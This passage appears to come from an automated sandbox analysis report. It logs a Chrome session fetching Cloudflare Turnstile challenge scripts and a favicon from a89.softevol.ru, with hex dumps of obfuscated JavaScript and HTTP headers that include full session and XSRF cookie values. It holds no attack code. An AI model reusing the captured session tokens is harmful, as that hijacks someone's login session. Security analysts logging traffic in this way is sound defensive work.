                                                                2025-01-10 21:29:03 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.849733104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:03 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fffc2a2e94d0f6c&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:03 UTC331INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:03 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 117214
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2a73dc84299-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:03 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25
                                                                Data Ascii: r-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","human_button_text":"Verify%20you%20are%
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 2c 67 33 2c 67 34 2c 67 35 2c 67 39 2c 67 61 2c 67 62 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 30 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 39 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 30 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 36 34 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 30 37 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 35 31 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 37 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28
                                                                Data Ascii: ,g3,g4,g5,g9,ga,gb,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1607))/1+-parseInt(gI(294))/2+-parseInt(gI(1206))/3*(parseInt(gI(1164))/4)+-parseInt(gI(207))/5+-parseInt(gI(451))/6*(-parseInt(gI(1247))/7)+parseInt(
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 65 4d 5b 68 67 28 31 31 37 38 29 5d 5b 68 67 28 31 30 34 36 29 5d 28 29 2c 65 4d 5b 68 67 28 31 31 37 38 29 5d 5b 68 67 28 32 34 36 29 5d 28 29 2c 65 4d 5b 68 67 28 33 33 31 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 67 28 31 35 32 39 29 5d 5b 68 67 28 35 32 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 67 28 33 36 38 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 67 28 31 31 33 33 29 5d 5b 68 67 28 31 31 38 34 29 5d 2c 27 65 76 65 6e 74 27 3a 68 67 28 31 30 38 32 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 67 28 31 31 33 33 29 5d 5b 68 67 28 31 31 37 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 67 28 31 31 33 33 29 5d 5b 68 67 28 32 37 35 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 68 67 28 32 32 31 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 67 28
                                                                Data Ascii: eM[hg(1178)][hg(1046)](),eM[hg(1178)][hg(246)](),eM[hg(331)]=!![],eM[hg(1529)][hg(525)]({'source':hg(368),'widgetId':eM[hg(1133)][hg(1184)],'event':hg(1082),'cfChlOut':eM[hg(1133)][hg(1172)],'cfChlOutS':eM[hg(1133)][hg(275)],'code':e[hg(221)],'rcV':eM[hg(
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 29 5d 28 43 29 5b 68 68 28 34 36 39 29 5d 28 27 2b 27 2c 68 68 28 33 36 36 29 29 2c 73 5b 68 68 28 33 34 31 29 5d 28 69 5b 68 68 28 31 34 33 37 29 5d 28 69 5b 68 68 28 31 34 33 37 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 68 28 31 31 33 33 29 5d 5b 68 68 28 31 33 32 33 29 5d 2c 27 3d 27 29 2c 44 29 29 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 37 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 68 69 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 42 2c 43 2c 44 2c 6f 2c 45 29 7b 69 66 28 68 69 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 68 69 28 31 32 34 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 66 5b 68 69 28 31 36 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73
                                                                Data Ascii: )](C)[hh(469)]('+',hh(366)),s[hh(341)](i[hh(1437)](i[hh(1437)]('v_'+eM[hh(1133)][hh(1323)],'='),D))}catch(E){}},eM[gJ(797)]=function(e,hi,f,g,h,i,j,k,l,m,n,B,C,D,o,E){if(hi=gJ,f={},f[hi(1243)]=function(s,v){return v===s},f[hi(1601)]=function(s,v){return s
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 3d 6a 2c 6c 3d 65 5b 68 6c 28 31 31 34 33 29 5d 28 29 2c 6d 3d 6b 5b 68 6c 28 31 34 32 30 29 5d 2c 6b 5b 68 6c 28 31 37 39 29 5d 28 6c 5b 68 6c 28 39 37 32 29 5d 28 6d 29 2c 2d 31 29 29 3f 65 4d 5b 68 6c 28 31 30 32 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6d 29 7b 68 6d 3d 68 6c 2c 65 4d 5b 68 6d 28 37 33 39 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6e 3d 7b 7d 2c 6e 5b 68 6c 28 33 31 32 29 5d 3d 65 2c 6e 5b 68 6c 28 37 33 37 29 5d 3d 66 2c 6e 5b 68 6c 28 36 32 32 29 5d 3d 67 2c 6e 5b 68 6c 28 35 34 37 29 5d 3d 68 2c 6e 5b 68 6c 28 35 33 36 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 68 6c 28 31 30 32 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 68 6e 3d 68 6c 2c 65 4d 5b 68 6e 28 31 35 31 32 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 68 6e 28 34 33 34 29 29
                                                                Data Ascii: =j,l=e[hl(1143)](),m=k[hl(1420)],k[hl(179)](l[hl(972)](m),-1))?eM[hl(1029)](function(hm){hm=hl,eM[hm(739)]()},1e3):(n={},n[hl(312)]=e,n[hl(737)]=f,n[hl(622)]=g,n[hl(547)]=h,n[hl(536)]=i,o=n,eM[hl(1029)](function(hn){hn=hl,eM[hn(1512)](o,undefined,hn(434))
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 3a 67 26 26 67 5b 69 61 28 31 30 32 33 29 5d 3d 3d 3d 66 5b 69 61 28 36 35 35 29 5d 26 26 66 5b 69 61 28 37 36 34 29 5d 28 67 5b 69 61 28 31 30 30 34 29 5d 2c 69 61 28 31 35 34 35 29 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 43 29 7d 29 2c 66 45 3d 21 5b 5d 2c 21 66 35 28 67 4a 28 34 31 31 29 29 26 26 28 67 32 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 59 2c 63 2c 64 2c 65 29 7b 69 59 3d 67 4a 2c 63 3d 7b 27 44 55 42 77 44 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 55 69 43 79 79 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 67 7d 2c 27 54 6f 53 77 71 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 7d 2c 64 3d 65
                                                                Data Ascii: :g&&g[ia(1023)]===f[ia(655)]&&f[ia(764)](g[ia(1004)],ia(1545))&&clearInterval(fC)}),fE=![],!f5(gJ(411))&&(g2(),setInterval(function(iY,c,d,e){iY=gJ,c={'DUBwD':function(f){return f()},'UiCyy':function(f,g){return f>g},'ToSwq':function(f,g){return f-g}},d=e
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 5b 6a 34 28 36 33 37 29 5d 5b 6a 34 28 31 31 38 37 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 34 28 31 30 38 37 29 5d 5b 6a 34 28 32 36 38 29 5d 26 26 67 5b 6a 34 28 31 30 34 31 29 5d 3f 67 5b 6a 34 28 31 30 38 37 29 5d 5b 6a 34 28 32 36 38 29 5d 28 6e 65 77 20 67 5b 28 6a 34 28 31 30 34 31 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 35 2c 48 29 7b 66 6f 72 28 6a 35 3d 6a 34 2c 47 5b 6a 35 28 31 32 34 35 29 5d 28 29 2c 48 3d 30 3b 6f 5b 6a 35 28 38 37 31 29 5d 28 48 2c 47 5b 6a 35 28 39 33 34 29 5d 29 3b 6f 5b 6a 35 28 31 35 33 38 29 5d 28 47 5b 48 5d 2c 47 5b 6f 5b 6a 35 28 39 32 31 29 5d 28 48 2c 31 29 5d 29 3f 47 5b 6a 35 28 35 30 30 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41
                                                                Data Ascii: [j4(637)][j4(1187)](h))),x=g[j4(1087)][j4(268)]&&g[j4(1041)]?g[j4(1087)][j4(268)](new g[(j4(1041))](x)):function(G,j5,H){for(j5=j4,G[j5(1245)](),H=0;o[j5(871)](H,G[j5(934)]);o[j5(1538)](G[H],G[o[j5(921)](H,1)])?G[j5(500)](H+1,1):H+=1);return G}(x),B='nAsA
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 57 6e 52 78 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4e 50 50 58 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4a 6a 47 70 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 70 48 51 6f 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 62 6c 74 54 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 48 7a 50 48 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 73 49 75 4d 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69
                                                                Data Ascii: i){return i==h},'WnRxu':function(h,i){return h<<i},'NPPXE':function(h,i){return h==i},'JjGpw':function(h,i){return h-i},'pHQoo':function(h,i){return h(i)},'bltTs':function(h,i){return h|i},'HzPHB':function(h,i){return h&i},'sIuMk':function(h,i){return h<i
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 2c 51 2c 52 29 7b 69 66 28 6a 62 3d 6a 37 2c 78 3d 7b 7d 2c 78 5b 6a 62 28 37 34 30 29 5d 3d 6a 62 28 31 31 35 30 29 2c 78 5b 6a 62 28 37 34 37 29 5d 3d 6a 62 28 31 35 32 39 29 2c 78 5b 6a 62 28 31 32 36 39 29 5d 3d 6a 62 28 31 33 36 39 29 2c 78 5b 6a 62 28 31 30 35 37 29 5d 3d 64 5b 6a 62 28 34 37 30 29 5d 2c 42 3d 78 2c 6a 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 64 5b 6a 62 28 31 33 31 33 29 5d 28 4d 2c 6a 5b 6a 62 28 39 33 34 29 5d 29 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 6a 62 28 31 34 38 36 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 6a 62 28 32 36 35 29 5d 5b 6a 62 28 32 37 36 29 5d 5b 6a 62 28 38 38 34
                                                                Data Ascii: ,Q,R){if(jb=j7,x={},x[jb(740)]=jb(1150),x[jb(747)]=jb(1529),x[jb(1269)]=jb(1369),x[jb(1057)]=d[jb(470)],B=x,j==null)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;d[jb(1313)](M,j[jb(934)]);M+=1)if(N=j[jb(1486)](M),Object[jb(265)][jb(276)][jb(884


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.849732104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:03 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:03 UTC240INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:03 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2a749f032fa-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.849722172.67.147.104431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:04 UTC1314OUTGET /favicon.ico HTTP/1.1
                                                                Host: a89.softevol.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://a89.softevol.ru/5fsy/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: XSRF-TOKEN=eyJpdiI6IkZoVUJMbndxd1M4REQ1a25lYXloR0E9PSIsInZhbHVlIjoiMTEzRW1jbWF1NjI1TjhzZWFhTkJzSi9xckhNbzBTQkRxUjRvQTNiM3lkaE1MWmwrRWlzQXZJUFFvSk9sT0hnMXFKbzQycEcvMHNNbmRsZU5sVXVXZGlDcGU0ZUVDN204QUFPMnhCVnZmSlpnSEhvSjZCM2JRb09GTTZBdkdJNWQiLCJtYWMiOiI2ODEzOGQzMmQ2MGQzNThiM2E2YTc0MjZjYzVkOWI0YzFhM2UzYjUwNDRjZjA0MjU4YTY3MjQ1YmEzZDBiMTVhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlUTzM3TW56djRhNEFSK0RRcHZMTUE9PSIsInZhbHVlIjoiWThiMFhGbGpJQlVQeEtZMUxUeHNIeE5VSE5FRWtrSWpzQStUV0NtZHN2a2o5VHYvM3BtekJFek4wUnBlZDY5aU1oYmFlOVRjUmxSbmNaMGE1S0NxeWFFbEZrZk02VS9hS3JrNitFTitNNzZoYkJtaHhkdVhia05xZXdxS2s1MUMiLCJtYWMiOiI0MGQ3ZTljMTczNjMxMWU3MDZjM2UwZDRkM2UxN2VmNTA3ODQ3ZTFkYTViZDlhZDg5YTcwMWExNmI1MjU3ODZkIiwidGFnIjoiIn0%3D
                                                                2025-01-10 21:29:04 UTC1069INHTTP/1.1 404 Not Found
                                                                Date: Fri, 10 Jan 2025 21:29:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=14400
                                                                Age: 2583
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2Fki3fnwNHqhvJN2WWZF4CvLsUqc%2FdQjsaVfqhMLoUE%2BVGKuBxmpANntayqzTPNDzxT5od6xcgxIHZgrpGu9cdifB7Y6ULH9zMviuQWBsZavNtUJVnllEK1MNLqo%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4885&min_rtt=4449&rtt_var=2048&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2122&delivery_rate=413532&cwnd=251&unsent_bytes=0&cid=e3f9d0b8377d6cfc&ts=25&x=0"
                                                                CF-Cache-Status: HIT
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2a9bd091819-EWR
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1616&rtt_var=641&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1892&delivery_rate=1806930&cwnd=215&unsent_bytes=0&cid=3e9f724eccb9e848&ts=3902&x=0"
                                                                2025-01-10 21:29:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.849735104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:04 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:04 UTC240INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:04 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 61
                                                                Connection: close
                                                                cache-control: max-age=2629800, public
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ab1a427ca2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.849736104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:04 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fffc2a2e94d0f6c&lang=auto HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:04 UTC331INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:04 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 112675
                                                                Connection: close
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ac9bf57d08-EWR
                                                                alt-svc: h3=":443"; ma=86400
